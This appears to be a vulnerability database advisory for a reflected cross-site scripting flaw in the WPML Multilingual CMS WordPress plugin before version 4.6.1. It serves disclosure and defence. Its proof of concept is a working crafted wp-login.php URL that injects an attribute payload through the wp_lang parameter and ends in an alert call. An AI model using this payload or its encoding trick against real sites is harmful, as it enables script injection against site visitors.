WordPress Plugin Vulnerabilities
WPML Multilingual CMS < 4.6.1 - Reflected Cross-Site Scripting
Description
The plugin does not escape some URL attributes before outputting them to a page, leading to a Reflected Cross-Site Scripting vulnerability.
Proof of Concept
After setting up the plugin, visit the following URL: /wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Deepak kumar, 0xcharan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-04-16 (about 1 years ago)
Added
2023-05-03 (about 1 years ago)
Last Updated
2023-05-04 (about 1 years ago)